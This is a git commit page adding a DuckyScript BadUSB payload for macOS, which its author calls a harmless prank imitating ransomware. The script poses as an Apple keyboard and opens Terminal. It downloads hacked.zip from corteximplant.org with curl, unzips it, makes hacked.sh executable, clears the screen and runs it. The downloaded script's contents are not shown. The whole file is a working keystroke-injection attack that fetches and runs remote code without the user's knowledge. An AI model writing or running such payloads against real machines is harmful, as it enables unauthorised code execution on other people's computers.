Add badusb/corteximplant-ransomware.txt
This commit is contained in:
commit
ec8a87637c
1 changed files with 40 additions and 0 deletions
40
badusb/corteximplant-ransomware.txt
Normal file
40
badusb/corteximplant-ransomware.txt
Normal file
|
@ -0,0 +1,40 @@
|
||||||
|
REM -----
|
||||||
|
REM Useless fun BadUSB script meant to imitate ransomware.
|
||||||
|
REM Open corteximplant.org in Safari and then
|
||||||
|
REM download hacked.sh, a bash script with the appearance of randomware.
|
||||||
|
REM
|
||||||
|
REM Created by Revengeday
|
||||||
|
REM Fedi: @revengeday@corteximplant.com
|
||||||
|
REM -----
|
||||||
|
ID 1234:5678 Apple:Keyboard
|
||||||
|
DELAY 500
|
||||||
|
GUI SPACE
|
||||||
|
DELAY 500
|
||||||
|
STRING safari
|
||||||
|
ENTER
|
||||||
|
DELAY 1500
|
||||||
|
STRING corteximplant.org
|
||||||
|
ENTER
|
||||||
|
DELAY 1500
|
||||||
|
GUI SPACE
|
||||||
|
DELAY 500
|
||||||
|
STRING terminal
|
||||||
|
ENTER
|
||||||
|
DELAY 1500
|
||||||
|
STRING curl -O https://corteximplant.org/stuff/hacked.zip
|
||||||
|
ENTER
|
||||||
|
DELAY 5000
|
||||||
|
STRING unzip hacked.zip
|
||||||
|
ENTER
|
||||||
|
DELAY 1500
|
||||||
|
STRING rm hacked.zip
|
||||||
|
ENTER
|
||||||
|
DELAY 1500
|
||||||
|
STRING chmod +x hacked.sh
|
||||||
|
ENTER
|
||||||
|
DELAY 1500
|
||||||
|
STRING clear
|
||||||
|
ENTER
|
||||||
|
DELAY 500
|
||||||
|
STRING ./hacked.sh
|
||||||
|
ENTER
|
Loading…
Reference in a new issue